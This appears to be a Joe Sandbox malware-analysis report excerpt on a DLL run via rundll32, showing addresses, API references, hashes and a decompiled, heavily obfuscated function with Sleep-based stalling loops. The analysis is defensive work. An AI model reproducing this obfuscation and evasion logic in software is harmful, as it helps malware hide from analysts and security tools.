                          0x6e2017ad
                          0x6e2017b4
                          0x6e2017b7
                          0x6e2017c3
                          0x6e2017c6
                          0x6e2017cc
                          0x6e2017e9
                          0x6e2017f0
                          0x6e2017f0
                          0x6e2017f3
                          0x6e2017f6
                          0x6e2017f8
                          0x6e2017ce
                          0x6e2017d1
                          0x6e2017d9
                          0x6e2017e4
                          0x6e2017e4
                          0x6e2017fe
                          0x6e201801
                          0x6e201806
                          0x6e201809
                          0x6e20180c
                          0x6e20180f
                          0x6e201812
                          0x6e201878
                          0x00000000
                          0x6e201814
                          0x6e20181b
                          0x6e20181f
                          0x6e201824
                          0x6e201827
                          0x6e201830
                          0x6e201836
                          0x6e201838
                          0x6e201840
                          0x6e201842
                          0x00000000
                          0x6e201842
                          0x6e201840
                          0x00000000
                          0x6e201845
                          0x6e201845
                          0x6e201848
                          0x6e20184b
                          0x6e201854
                          0x6e201855
                          0x6e201858
                          0x6e20185b
                          0x6e201861
                          0x6e20187d
                          0x6e201884
                          0x6e201889
                          0x6e201889
                          0x6e20188c
                          0x6e20188e
                          0x6e201863
                          0x6e201865
                          0x6e20186b
                          0x00000000
                          0x6e20186d
                          0x6e20186d
                          0x6e201870
                          0x6e201870
                          0x6e201870
                          0x6e20186b
                          0x6e201891
                          0x6e201897
                          0x6e2018b1
                          0x6e201899
                          0x6e201899
                          0x6e2018a5
                          0x6e2018a7
                          0x6e2018ad
                          0x6e2018ad
                          0x6e2018b6
                          0x6e2018c2
                          0x6e2018c5
                          0x6e2018c7
                          0x6e2018ca
                          0x6e2018cc
                          0x6e2018d2
                          0x6e2018d8
                          0x6e2018e1
                          0x6e2018e6
                          0x6e2018e9
                          0x6e2018eb
                          0x6e2018ed
                          0x6e2018f3
                          0x6e2018f6
                          0x6e2018fb
                          0x6e2018fe
                          0x6e201900
                          0x6e201906
                          0x6e201906
                          0x6e20190f
                          0x6e201912
                          0x6e201915
                          0x6e20191c
                          0x6e20191f
                          0x6e201924
                          0x6e201927
                          0x6e20192e
                          0x6e201931
                          0x6e201931
                          0x6e201935
                          0x00000000
                          0x6e201937
                          0x6e201941
                          0x6e201944
                          0x6e201946
                          0x6e201955
                          0x6e201957
                          0x6e20195a
                          0x00000000
                          0x6e20195a
                          0x6e201955
                          0x00000000
                          0x6e201961
                          0x6e201961
                          0x6e201964
                          0x6e201967
                          0x6e20196e
                          0x6e201975
                          0x6e20197a
                          0x6e20197f
                          0x6e201985
                          0x6e201988
                          0x6e20198a
                          0x6e20198f
                          0x6e201993
                          0x6e201995
                          0x6e201998
                          0x6e20199f
                          0x6e20199f
                          0x6e2019a1
                          0x6e2019a9
                          0x6e2019ab
                          0x6e2019b1
                          0x6e2019b8
                          0x6e2019eb
                          0x6e2019ba
                          0x6e2019c4
                          0x6e2019c9
                          0x6e2019d2
                          0x6e2019d5
                          0x6e2019d7
                          0x6e2019dd
                          0x6e2019e3
                          0x6e2019e3
                          0x6e2019ee
                          0x6e2019f3
                          0x6e2019fc
                          0x6e2019fe
                          0x6e201a01
                          0x6e201a04
                          0x6e201a04
                          0x6e201a07
                          0x6e201a0a
                          0x6e201a0a
                          0x6e201a0c
                          0x6e201a0f
                          0x6e201a11
                          0x6e201a19
                          0x6e201a1e
                          0x6e201a1f
                          0x6e201a25
                          0x6e201a2c
                          0x6e201a31
                          0x6e201a31
                          0x6e201a33
                          0x6e201a33
                          0x6e201a39
                          0x6e201a41
                          0x6e201a46
                          0x6e201a4b
                          0x6e201a51
                          0x6e201a56
                          0x6e201a5c
                          0x6e201a5e
                          0x6e201a64
                          0x6e201a6e
                          0x6e201a6e
                          0x6e201a71
                          0x6e201a76
                          0x6e201a78
                          0x6e201a7a
                          0x6e201a80
                          0x6e201a86
                          0x6e201a89
                          0x6e201a8b
                          0x6e201a66
                          0x6e201a66
                          0x6e201a6c
                          0x00000000
                          0x00000000
                          0x6e201a6c
                          0x6e201a91
                          0x6e201a94
                          0x6e201a9c
                          0x6e201aa3
                          0x6e201aa5
                          0x6e201ab0
                          0x6e201ab4
                          0x6e201ab6
                          0x6e201abd
                          0x6e201ac5
                          0x6e201acf
                          0x6e201ad5
                          0x6e201ad7
                          0x6e201add
                          0x6e201adf
                          0x6e201adf
                          0x6e201ae5
                          0x6e201af0
                          0x6e201afc
                          0x6e201b07

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20128C
                          • GetSystemDirectoryA.KERNEL32 ref: 6E2013C5
                          • GetTempPathA.KERNEL32(0000056D,C:\Users\user\AppData\Local\Temp\,?,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E,?,00000001,?), ref: 6E201468
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryH_prolog3PathSystemTemp
                          • String ID: (Z,n$6265$6623$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$DZ,n$DZ,n$DZ,n$DZ,n$E$Had s$Molecul$cd Island$cd Matter m$out drop $part $Y,n$Y,n$Y,n
                          • API String ID: 3607090873-2547998857
                          • Opcode ID: 1ec597e508b1389623b27b9f2332c2d0fe6531852423472695b85293070f7f77
                          • Instruction ID: 728cb7aee2a600c8191dd4e8088b25b04de57e2a826a6255d42a11b98fbc2278
                          • Opcode Fuzzy Hash: 1ec597e508b1389623b27b9f2332c2d0fe6531852423472695b85293070f7f77
                          • Instruction Fuzzy Hash: 0132C371A8161A8FCF84CFA9C49D5AD77F3BB89B14B24456BD405DB780E730E980CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1FFB4A, Relevance: 14.6, APIs: 1, Strings: 8, Instructions: 1094sleepCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E1FFB4A(intOrPtr __ecx, void* __eflags) {
				signed int _v1;
				signed int _v2;
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed char _v64;
				intOrPtr _v68;
				signed int _t321;
				signed char _t324;
				signed short _t327;
				signed short _t344;
				void* _t346;
				signed short _t352;
				void* _t358;
				signed int _t360;
				signed short _t365;
				signed int _t367;
				signed char _t370;
				signed int _t377;
				signed int _t380;
				signed int _t383;
				signed int _t386;
				signed int _t387;
				void* _t398;
				signed char _t402;
				signed char _t403;
				signed int _t405;
				signed int _t406;
				signed char _t410;
				void* _t414;
				signed int _t415;
				void* _t419;
				signed int _t428;
				signed int _t431;
				signed char _t434;
				void* _t437;
				signed char _t440;
				signed int _t441;
				void* _t450;
				signed short _t456;
				signed int _t457;
				signed int _t461;
				void* _t462;
				signed int _t465;
				signed int _t470;
				signed int _t472;
				signed int _t477;
				signed char _t479;
				signed int _t486;
				signed int _t494;
				signed short _t500;
				void* _t502;
				signed int _t505;
				signed short _t508;
				signed int _t513;
				signed int _t516;
				void* _t519;
				void* _t522;
				signed char _t524;
				signed int _t528;
				signed char _t532;
				signed short _t535;
				signed int _t544;
				signed int _t547;
				signed short _t551;
				void* _t560;
				signed short _t567;
				intOrPtr _t569;
				signed char _t570;
				signed char _t583;
				signed int _t584;
				signed int _t593;
				signed char _t600;
				void* _t610;
				signed char _t611;
				signed int _t639;
				signed int _t648;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t665;
				void* _t666;
				signed int _t669;
				signed int _t672;
				signed char _t674;
				signed char _t675;
				void* _t680;
				signed char _t681;
				signed char _t684;
				void* _t692;
				signed char _t694;
				signed char _t695;
				void* _t698;
				signed int _t713;
				signed int _t718;
				signed int _t720;
				signed short* _t722;
				signed int _t723;
				void* _t725;
				intOrPtr* _t726;
				signed int _t728;
				signed int _t729;
				signed char _t733;
				signed int _t736;
				void* _t737;
				signed int _t738;
				signed char _t740;
				signed char _t743;
				signed int _t748;
				signed int _t754;
				signed int _t757;
				signed int _t759;
				signed int _t761;
				signed int _t766;
				signed char _t772;
				signed int _t785;
				signed int _t793;
				signed short _t798;
				signed int _t808;
				signed int _t813;
				signed int _t817;
				signed char _t818;
				signed int _t819;
				signed int _t827;
				signed short* _t841;
				signed int _t842;
				signed int _t843;
				signed int _t845;
				signed short _t848;
				signed short _t849;
				signed char _t851;
				signed int _t852;
				signed char _t854;
				signed char _t855;
				signed int _t856;
				signed int _t858;
				signed char _t863;
				signed int _t866;
				signed int _t872;
				signed short _t877;
				signed int _t879;
				signed int _t881;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed short _t886;
				signed int _t888;
				signed short _t892;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				void* _t903;
				signed short _t904;
				signed short _t905;
				signed int _t906;
				void* _t908;
				signed int _t910;
				signed int _t912;
				signed short _t915;
				signed int _t919;
				void* _t923;
				signed int _t930;
				void* _t948;
				void* _t964;
				void* _t968;

				_t321 =  *0x6e2c5a90; // 0x843221fd
				 *0x6e2c59f2 =  *0x6e2c59f2 - _t321;
				_v60 = _t321;
				_v68 = __ecx;
				_t324 = E6E1FFA83();
				 *0x6e2dc8d0 = 0x6e2c86a0;
				_v64 = _t324;
				 *0x6e2c5a04 = _t324 - _v60 - 0x54;
				_t327 = E6E1FF7A5();
				_t713 =  *0x6e2c5a90; // 0x843221fd
				_t898 =  *0x6e2c59e6 & 0x0000ffff;
				_t879 =  *0x6e2c5a00; // 0xf1bb93cc
				_t648 = _v60;
				_v8 = _t327 & 0x0000ffff;
				_v28 = 0x6e2c59e6;
				_t841 = 0x6e2c59e6;
				_v56 = _t713;
				do {
					if(_t879 == _t898) {
						goto L3;
					}
					_t9 = _t879 + 5; // 0xf1bb93d1
					_t648 = _t648 * ( *_t841 & 0x0000ffff);
					_t713 = _t9 + _t648;
					 *0x6e2c5a90 = _t713;
					if(_t713 == ( *0x6e2c59f0 & 0x0000ffff)) {
						break;
					}
					L3:
					_t841 =  &(_t841[1]);
				} while (_t841 < 0x6e2c5a44);
				_v56 = _t713;
				_t651 = _v64 - ( *0x6e2c5a04 & 0x000000ff) * 0x3d - _t713;
				 *0x6e2c59d0 = _t651;
				 *0x6e2c5a04 = _t651 - _t713 - 0x54;
				if(_t651 >= _t713) {
					_t877 = _v8;
					 *0x6e2c59f2 =  *0x6e2c59f2 - _t877;
					_t930 = _t877 & 0x0000ffff;
					_t651 = _t651 - _t713 * 0x3d - _t930;
					 *0x6e2c59d0 = _t651;
					 *0x6e2c5a90 = _t651 - _t713 + _t930;
				}
				E6E1FFA83();
				_t842 =  *0x6e2c59d0; // 0xf9ac1f88
				_t652 = _v56;
				 *0x6e2c5a04 = _t842 -  *0x6e2c5a04 + _t652;
				_v40 = _t842;
				if(( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) != 0x32) {
					_t718 = _t879 *  *0x6e2c5a90 * 0x10e1d;
					_t652 = _t718 * 0x37;
					__eflags = _t652;
				} else {
					_t639 =  *0x6e2c5a90; // 0x843221fd
					_t718 = _t879 - _t639 * _t639 * 0x10e1d + _t652;
				}
				 *0x6e2c5a90 = _t718;
				_t344 = E6E1FF7A5();
				_t899 =  *0x6e2c5a90; // 0x843221fd
				_t720 = _v40;
				_v8 = _t344 & 0x0000ffff;
				_t843 = _v8 & 0x0000ffff;
				_t346 = 0xffffffac;
				_t653 = _t652 + _t346 - _t899;
				if(_t720 >= _t899) {
					 *0x6e2c59f2 =  *0x6e2c59f2 - _v8;
					_t720 = _t720 - _t899 * 0x3d - _t843;
					 *0x6e2c59d0 = _t720;
					 *0x6e2c5a90 = _t720 - _t899 + _t843;
				}
				_v40 = _t720;
				E6E1FF8B8(_t720, _t843);
				 *0x6e2c5a04 = _v40 - _t653 - 0x54;
				_t352 = E6E1FFA83();
				_t900 =  *0x6e2c59e6 & 0x0000ffff;
				_t722 = _v28;
				_t845 =  *0x6e2c5a90; // 0x843221fd
				_v64 = _t352 & 0x0000ffff;
				do {
					if(_t879 == _t900) {
						goto L14;
					}
					_t23 = _t879 + 5; // 0xf1bb93d1
					_t653 = _t653 * ( *_t722 & 0x0000ffff);
					_t845 = _t23 + _t653;
					if(_t845 == ( *0x6e2c59f0 & 0x0000ffff)) {
						break;
					}
					L14:
					_t722 =  &(_t722[1]);
				} while (_t722 < 0x6e2c5a44);
				 *0x6e2c5a90 = _t845;
				_v36 = 0x2541188;
				_v52 = 0x2541188;
				_t901 = _v64 & 0x0000ffff;
				_t358 = 6;
				_t948 =  *0x6e2c5a02 - _t358; // 0xf1bb
				if(_t948 == 0) {
					_t28 = _t901 + 0x11dde; // 0x84333fdb
					_t360 = _t28 + _t845;
					__eflags = _t360;
					_v16 = _t360;
					_t723 = _t360;
				} else {
					_t723 =  *0x6e2c59d0; // 0xf9ac1f88
					_v16 = _t723;
					 *0x6e2c5a90 = _t845 +  ~_t901 - _t723 * 0x3d;
				}
				 *0x6e2c5a04 = _t723 - _t653 - 0x54;
				_t365 = E6E1FF7A5() & 0x0000ffff;
				_v20 = _t365;
				_v8 = _t365;
				_v44 = _t365 & 0x0000ffff;
				_t367 =  *0x6e2c5a90; // 0x843221fd
				_v60 = 0xf;
				_v64 = 0xb4;
				_t36 = _t367 + 0x3b; // 0x84322238
				_t725 = _t36 + _t653 * 2;
				_t654 =  *0x6e2c5a90; // 0x843221fd
				_t370 = _v16 - _t725 - 0x54;
				_v12 = _t370;
				_t881 = (_t370 & 0x000000ff) * 0x36 + _t725;
				_v24 = _t881;
				 *0x6e2c5a00 = _t881;
				if(( *0x6e2c59f2 & 0x0000ffff) <= _t881) {
					 *0x6e2c59e0 = _t654;
					_t725 = _t654 * 0x36 + _t881;
				}
				_t41 = _t725 + 0x11dde; // 0x84334016
				_v40 = 0xbc;
				_t903 = _t41 + _t654;
				_t726 = 0x6e2c5a0e;
				_v32 = _v32 & 0x00000000;
				do {
					if(_t881 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t726 =  *_t726 + _t881;
						_t45 = _t881 + 5; // 0xf1bb93d1
						_t654 = _t45 + _t903;
						_t46 = _t881 + 0x3b; // 0xf1bb9407
						_t903 = _t903 + _t46 + _t654;
					}
					_t726 = _t726 - 4;
				} while (_t726 > 0x6e2c59e2);
				_t47 = _t654 + 5; // 0xf1bb93d6
				_t904 =  *0x6e2c59f2; // 0xcdeb
				_v48 = _t47 + _t903;
				if(_t904 <= _v8) {
					 *0x6e2c59e0 = _t654;
					_v12 = (_t654 & 0x000000ff) * 0x36 + _v8;
				}
				_t848 =  *0x6e2c59e6; // 0xe945
				_t377 = (_t904 & 0x0000ffff) + (_t848 & 0x0000ffff);
				_v56 = _t377;
				if(_t377 != 0x32) {
					_t728 = _t881 * _t654 * 0x10e1d;
					_t380 = _t728 * 0x37;
					__eflags = _t380;
				} else {
					_t380 = _v48;
					_t728 = _t881 - _t654 * _t654 * 0x10e1d + _t380;
				}
				_t658 =  ~_t728 - _t380 * 0x3c;
				_v48 = _t658;
				_t383 = _v44 & 0x0000ffff;
				if(_v56 != 0x32) {
					_t729 = _t383 * _t728 * 0x10e1d;
					_t386 = (_t729 & 0x000000ff) * 0x37;
					__eflags = _t386;
					_v12 = _t386;
				} else {
					_t881 = _v24;
					_t729 = (_v12 & 0x000000ff) - _t728 * _t728 * 0x10e1d + (_v44 & 0x0000ffff);
				}
				_t387 = _t848 & 0x0000ffff;
				_t849 =  *0x6e2c59f0; // 0x90
				_v48 = _t387;
				do {
					if(_t881 == _t387) {
						goto L36;
					}
					_t658 = _t658 * ( *_v28 & 0x0000ffff);
					_t63 = _t658 + 5; // 0x6e2c5a0f
					_t729 = _t63 + _t881;
					if(_t729 == (_t849 & 0x0000ffff)) {
						break;
					}
					_t387 = _v48;
					L36:
					_v28 = _v28 + 2;
				} while (_v28 < 0x6e2c5a44);
				_v48 = _t658;
				if(_v56 != 0x32) {
					_t659 = (_v44 & 0x0000ffff) * _t729 * 0x10e1d;
					__eflags = _t659;
				} else {
					_t659 = (_v12 & 0x000000ff) - _t729 * _t729 * 0x10e1d + (_v44 & 0x0000ffff);
				}
				_t851 = _v16;
				while(1) {
					_t852 = _v48;
					_v44 =  *0x6e2c59e6 & 0x0000ffff;
					_t733 = _t851 - _t852 - 0x54;
					_v32 = _v32 + 1;
					if((_t904 & 0x0000ffff) + _v44 != 0x32) {
						_t659 = (_v8 & 0x0000ffff) * _t659 * 0x10e1d;
						_t733 = (_t659 & 0x000000ff) * 0x37;
						__eflags = _t733;
					} else {
						_t659 = (_t733 & 0x000000ff) - _t659 * _t659 * 0x10e1d + (_v8 & 0x0000ffff);
					}
					 *0x6e2c5a90 = _t659;
					_t854 = 0x3b + _t852 * 2 + _t659;
					_t964 =  *0x6e2c5a04 - 0x1b47; // 0xb4
					if(_t964 == 0) {
						_t854 = _t854 + _v44;
						_v16 = _v16 + _t854 * 2 + 0x3b;
					}
					_t905 =  *0x6e2c59f2; // 0xcdeb
					if(_t854 > (_v8 & 0x0000ffff)) {
						_t854 = (_t854 - _t881 * 0x3d - _t659) * _t659 * 0x10e1d;
						_t827 = _t881;
						_v56 = ((_t733 & 0x000000ff) * (_t854 & 0x000000ff) & 0x000000ff) * 0x1d;
						if(_v8 == 0) {
							_t610 = 6;
							_t968 =  *0x6e2c5a02 - _t610; // 0xf1bb
							_t611 = _v56;
							if(_t968 != 0) {
								_t881 = _t881 - ((_t611 & 0x000000ff) + _t854) * 0x3d - _t659 + 0xffffff86;
								_v24 = _t881;
								_t827 = _t881;
								 *0x6e2c5a00 = _t881;
							}
						}
						_t905 =  *0x6e2c59f2; // 0xcdeb
						_t733 = _v56;
						_v16 = (_v8 & 0x0000ffff) * 0x36 + _t827;
					}
					_t398 = 0xffffffac;
					_t855 = _t854 + _t398 - _t659;
					_v48 = _t855;
					_t736 = _v16;
					_t402 = ((_t855 & 0x000000ff) * (_t733 & 0x000000ff) & 0x000000ff) * 0x1d;
					_v56 = _t402;
					if(_t736 >= _t855) {
						_v12 = _t736;
						__eflags =  *0x6e2c5a04 - 0x1b47; // 0xb4
						_t856 = _t659;
						_t881 = _v24;
						_v16 = _t856;
						_v28 = _t402;
						if(__eflags == 0) {
							_t856 = _v44 + _t659;
							_v28 = _t402;
							_t659 = _t856;
							_v16 = _t856;
							 *0x6e2c5a90 = _t659;
							_v56 = _t402;
							_t736 = _t736 + _t856 * 2 + 0x3b;
							__eflags = _t736;
							_v12 = _t736;
						}
						_t403 = _v28;
					} else {
						_t872 = _t855 + 5 + _t659;
						_v48 = _t872;
						_t600 = ((_t855 & 0x000000ff) * (_t402 & 0x000000ff) & 0x000000ff) * 0x1d;
						_v28 = _t600;
						_t403 = _v28;
						_t736 = _v16 - (_t600 & 0x000000ff) * 0x3d - _t872;
						_v56 = _t403;
						_t856 = _t659;
						_v12 = _t736;
						_v16 = _t856;
					}
					if(_v52 < 1) {
						break;
					}
					_t817 = 0x3b + _v48 * 2 + _t856;
					_v56 = _t817;
					 *0x6e2c5a04 = _v12 + 5 + _t817;
					E6E1FF5C7();
					_t583 =  *0x6e2c5a04; // -76
					_t866 = _v12;
					_t904 =  *0x6e2c59f2; // 0xcdeb
					_v2 = _t583;
					_t584 = _t583 & 0x000000ff;
					if(_t866 >= _t584) {
						_t819 = _v56;
						_t904 = _t904 - _t819;
						 *0x6e2c59f2 = _t904;
						_t866 = _t866 - _t584 * 0x3d - _t819;
						_v2 = _t866 - _v2 + _t819;
					}
					_t818 = _v16;
					_t881 =  *0x6e2c5a00; // 0xf1bb93cc
					_v24 = _t881;
					_v48 = 0x3b + _v56 * 2 + _t818;
					_t851 = _v48 + 0x3b + (_v2 & 0x000000ff) + _t866;
					_v52 = _v52 - 1;
					_v16 = _t851;
					_t593 = _t851 - _t818 - 0x00000054 & 0x0000ffff;
					_v20 = _t593;
					_v8 = _t593;
				}
				_v52 = _t659;
				_t660 = _v12;
				__eflags = _t660 - (_t403 & 0x000000ff);
				if(_t660 < (_t403 & 0x000000ff)) {
					_t661 = _v48;
					_t405 = _v12;
				} else {
					_t661 = _v48;
					_t736 = _t660 - (_v56 & 0x000000ff) * 0x3d - _t661;
					 *0x6e2c59f2 = _t905 - _t661;
					_t405 = _t736;
				}
				_v1 = _t405;
				_v1 = _v1 - _t661;
				_v1 = _v1 - 0x54;
				_v2 = _v1;
				_t858 = _v16;
				__eflags = _t405 - _t661;
				if(_t405 <= _t661) {
					_t406 = _v2;
				} else {
					_t813 = _t736 + 5 + _t661;
					_t923 = 0xffffffac;
					_v1 = _t813;
					_t661 = _t661 + _t923 - _t858;
					_t406 = _t813;
					_v2 = _t406;
					__eflags =  *0x6e2c5a04 - 0x1b47; // 0xb4
					if(__eflags == 0) {
						_t881 = _t881 + ( *0x6e2c59e6 & 0x0000ffff);
						_v1 = _t813;
						_t406 = _t813;
						_v24 = _t881;
						_v2 = _t406;
					}
				}
				_t737 = 6;
				__eflags =  *0x6e2c5a02 - _t737; // 0xf1bb
				_t738 = _t881;
				if(__eflags == 0) {
					_t906 = _v52;
					_t661 = _t858 + 0x11dde + _t738;
					__eflags = _t661;
					_v2 = _t406;
				} else {
					_t906 = _t858 - _t661 * 0x3d - _t881;
					 *0x6e2c5a90 = _t906;
					_t858 = _t906;
				}
				_t665 =  ~_t858 - _t661 * 0x3c;
				_v12 = _t665;
				__eflags = ".?AV_System_error_category@std@@" - 0x1b47; // 0x56413f2e
				if(__eflags != 0) {
					L73:
					goto L74;
				} else {
					__eflags = "_System_error_category@std@@";
					if("_System_error_category@std@@" != 0) {
						goto L73;
					}
					_t569 =  *0x6e2c5a28; // -21
					_t570 = _t569 + _v1;
					_v2 = _t570;
					_t665 = _t665 + (_t570 & 0x000000ff) * 2 + 0x3b;
					_v12 = _t665;
					L74:
					_t410 = _v2;
					_t883 = _t410 & 0x000000ff;
					_t666 = _t665 + (_t410 & 0x000000ff) + 2;
					__eflags = ( *0x6e2c59f2 & 0x0000ffff) - _t666;
					if(( *0x6e2c59f2 & 0x0000ffff) <= _t666) {
						_t567 = _v8;
						 *0x6e2c59e0 = _t567;
						_t906 = (_t567 & 0x0000ffff) * 0x36 + _t666;
						__eflags = _t906;
						 *0x6e2c5a90 = _t906;
						_t858 = _t906;
					}
					_t414 = 6;
					__eflags =  *0x6e2c5a98 - _t414; // 0x6e26e664
					if(__eflags != 0) {
						L79:
						_t415 = _v12;
						goto L80;
					} else {
						__eflags =  *0x6e2c5a9c;
						if( *0x6e2c5a9c != 0) {
							goto L79;
						}
						_t415 = _t883 + 0x11dde + _t666;
						_v12 = _t415;
						L80:
						_t669 = _t666 - 0x6e2dc204 + 0xdc5379c0;
						_t740 = _t738 + 5 + _t415;
						__eflags = _t740;
						_v16 = _t740;
						 *0x6e2c5a04 = _t740;
						while(1) {
							_t884 = _t906 & 0x0000ffff;
							_v56 = _t884;
							_t885 = _t669 - _v20 + _t884 & 0x0000ffff;
							_t419 = 6;
							_v8 = _t885;
							__eflags =  *0x6e2c5a02 - _t419; // 0xf1bb
							if(__eflags == 0) {
								_t885 = _v8;
								_t669 = _v12 + 0x11dde + (_t740 & 0x000000ff);
								__eflags = _t669;
							} else {
								_v16 = _v16 +  ~_v12 - (_t669 & 0x000000ff) * 0x3d;
								_t740 = _v16;
								 *0x6e2c5a04 = _t740;
							}
							_v2 = _v12;
							__eflags = _t669 - 0xffb1;
							if(_t669 > 0xffb1) {
								_v8 = _t669 - _t885 + _v56 & 0x0000ffff;
								_t560 = 6;
								__eflags =  *0x6e2c5a02 - _t560; // 0xf1bb
								if(__eflags == 0) {
									_t669 = _v12 + 0x11dde + (_t740 & 0x000000ff);
									__eflags = _t669;
								} else {
									_v16 = _v16 +  ~_v2 - (_t669 & 0x000000ff) * 0x3d;
									_t740 = _v16;
									 *0x6e2c5a04 = _t740;
								}
							}
							__eflags = _v32 - 0x4c;
							if(_v32 < 0x4c) {
								_t892 =  *0x6e2c59f2; // 0xcdeb
								_t698 = (_v8 & 0x0000ffff) * 0x36 + _t858;
								__eflags = ( *0x6e2c59e6 & 0x0000ffff) + (_t892 & 0x0000ffff) - 0x32;
								_t772 = _v16;
								_t544 = _t772 & 0x000000ff;
								if(( *0x6e2c59e6 & 0x0000ffff) + (_t892 & 0x0000ffff) != 0x32) {
									_t740 = ((_v32 & 0x000000ff) * _t544 & 0x000000ff) * 0x1d;
									_t547 = (_t740 & 0x000000ff) * 0x37;
									__eflags = _t547;
									_v12 = _t547;
								} else {
									_t740 = _v32 - ((_t772 & 0x000000ff) * _t544 & 0x000000ff) * 0x1d + _v2;
								}
								_v16 = _t740;
								 *0x6e2c5a04 = _t740;
								_t551 = _t698 - _v56 - 0x00000054 & 0x0000ffff;
								_v8 = _t551;
								_t669 = _t698 - (_t551 & 0x0000ffff) * 0x3d - _t858;
								__eflags = _t669;
							}
							_t886 =  *0x6e2c59f2; // 0xcdeb
							_v52 = _v8 & 0x0000ffff;
							_v56 =  *0x6e2c59e6 & 0x0000ffff;
							__eflags = (_t886 & 0x0000ffff) + _v56 - 0x32;
							if((_t886 & 0x0000ffff) + _v56 != 0x32) {
								_t428 = _t858 * _v24 * 0x10e1d;
								__eflags = _t428;
							} else {
								_t428 = _t669 - _v24 * _v24 * 0x10e1d + _t858;
							}
							__eflags = _v36;
							_v24 = _t428;
							 *0x6e2c5a00 = _t428;
							_t672 = _v52 & 0x0000ffff;
							if(_v36 <= 0) {
								break;
							}
							_t680 = _t672 + 0x11dde + _t858;
							__eflags = _t680 - (_t740 & 0x000000ff);
							if(_t680 >= (_t740 & 0x000000ff)) {
								 *0x6e2c59f2 = _t886 - _v12;
								_t695 = _t680 - (_t740 & 0x000000ff) * 0x3e;
								__eflags = _t695;
								_t740 = _t695;
								_v16 = _t740;
								 *0x6e2c5a04 = _t740;
							}
							_t681 = _v64;
							__eflags = _t681 - 7;
							if(_t681 < 7) {
								_t694 = _t681 - 1;
								_v64 = _t694;
								_t535 = _v24 + 5 + _t694;
								__eflags = _t535;
								_v8 = _t535 & 0x0000ffff;
							}
							_t684 = (_v8 & 0x0000ffff) + 0x11dde + _t858;
							_t450 = 6;
							 *0x6e2c59d0 = _t684;
							__eflags =  *0x6e2c5a02 - _t450; // 0xf1bb
							if(__eflags == 0) {
								_t754 = _v12;
								_t669 = _t754 + 0x11dde + (_t740 & 0x000000ff);
								__eflags = _t669;
								 *0x6e2c59d0 = _t669;
							} else {
								_t532 = _v16 +  ~_v12 - (_t684 & 0x000000ff) * 0x3d;
								_t754 = _v12;
								_v16 = _t532;
								 *0x6e2c5a04 = _t532;
							}
							_t888 = _t669;
							__eflags =  *0x6e2c5a04 - 0x1b47; // 0xb4
							if(__eflags == 0) {
								_t808 = _t754 + _v56;
								__eflags = _t808;
								_v12 = _t808;
								_t669 = _t888 + 0x3b + _t808 * 2;
								 *0x6e2c59d0 = _t669;
								_t888 = _t669;
							}
							_t456 = _v40 - _v8 + _v24 & 0x0000ffff;
							_v56 = _t456 & 0x0000ffff;
							__eflags = _t456 - 0x8816;
							_v20 = _t456;
							_t757 = _v12;
							_v8 = _t456;
							if(_t456 <= 0x8816) {
								L114:
								_t457 = _v12;
								goto L115;
							} else {
								_t669 = (_t456 & 0x0000ffff) + 0x11dde + _t858;
								_t888 = _t669;
								 *0x6e2c59d0 = _t669;
								__eflags = _v24 - _t757;
								if(_v24 == _t757) {
									_t522 = E6E1FF7A5();
									_t906 =  *0x6e2c5a90; // 0x843221fd
									_t692 = _t522;
									__eflags =  *0x6e2c5a04 - 0x1b47; // 0xb4
									if(__eflags == 0) {
										_t528 = _v12 + ( *0x6e2c59e6 & 0x0000ffff);
										_t919 = _t906 + 0x3b;
										__eflags = _t919;
										_v12 = _t528;
										_t906 = _t919 + _t528 * 2;
										 *0x6e2c5a90 = _t906;
									}
									_t524 =  *0x6e2c5a04; // -76
									_v16 = _t524;
									_t669 = _t692 +  ~_v12 - (_t524 & 0x000000ff) * 0x3d;
									__eflags = _t669;
									_t757 = _v12;
									 *0x6e2c59d0 = _t669;
									_t888 = _t669;
								}
								_t519 = 6;
								_t858 = _t906;
								__eflags =  *0x6e2c5a02 - _t519; // 0xf1bb
								if(__eflags == 0) {
									_t669 = _t757 + 0x11dde + _t858;
									__eflags = _t669;
									 *0x6e2c59d0 = _t669;
									_t888 = _t669;
									goto L114;
								} else {
									_t457 = _v12 +  ~_t858 - _t888 * 0x3d;
									_v12 = _t457;
									L115:
									__eflags = _v36 - 0xb0;
									if(_v36 >= 0xb0) {
										_t863 = _v16;
										_v28 = _v56 & 0x0000ffff;
									} else {
										__eflags = _t888 - _t457;
										if(_t888 >= _t457) {
											 *0x6e2c59f2 =  *0x6e2c59f2 - _t858;
											__eflags =  *0x6e2c59f2;
											 *0x6e2c59d0 = _t888 - _t457 * 0x3d - _t858;
										}
										Sleep(0x71); // executed
										_t513 = _v8 & 0x0000ffff;
										_t669 =  *0x6e2c59d0; // 0xf9ac1f88
										_t888 = _t669;
										_t863 =  *0x6e2c5a04; // -76
										_t906 =  *0x6e2c5a90; // 0x843221fd
